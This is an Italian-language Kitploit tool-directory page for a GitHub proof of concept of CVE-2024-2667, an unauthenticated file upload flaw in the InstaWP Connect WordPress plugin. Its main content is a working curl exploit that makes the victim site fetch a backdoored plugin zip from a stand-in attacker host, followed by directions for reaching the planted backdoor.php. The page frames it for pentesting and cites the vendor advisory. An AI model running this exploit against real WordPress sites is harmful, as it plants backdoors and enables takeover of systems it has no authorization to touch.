Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-2667 — Questa è una POC per CVE-2024-2667 (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - Caricamento arbitrario di file non autenticato) | Kitploit
Strumenti/GitHubGitHub/puvipavan/cve-2024-2667
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubpuvipavan/cve-2024-2667

CVE-2024-2667

Questa è una POC per CVE-2024-2667 (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - Caricamento arbitrario di file non autenticato)

Vedi Repository
22 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

InstaWP Connect – Staging e migrazione WP in 1 clic <= 0.1.0.22 - Caricamento file arbitrario non autenticato

POC (usando CURL):

root@kitploit:~
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"

api_key -> Puoi usare qualsiasi chiave API valida o non valida.
override_plugin_zip -> Percorso del file zip che contiene un plugin WordPress dannoso con una backdoor.

Una volta importato, puoi accedere alla backdoor tramite http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php (supponendo che il nome della directory sia malicious-plugin e che backdoor.php si trovi in quella directory)

Riferimenti:

  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/instawp-connect/instawp-connect-1-click-wp-staging-migration-01022-unauthenticated-arbitrary-file-upload
  • https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3061039%40instawp-connect&new=3061039%40instawp-connect&sfp_email=&sfph_mail=
  • Scarica lo strumento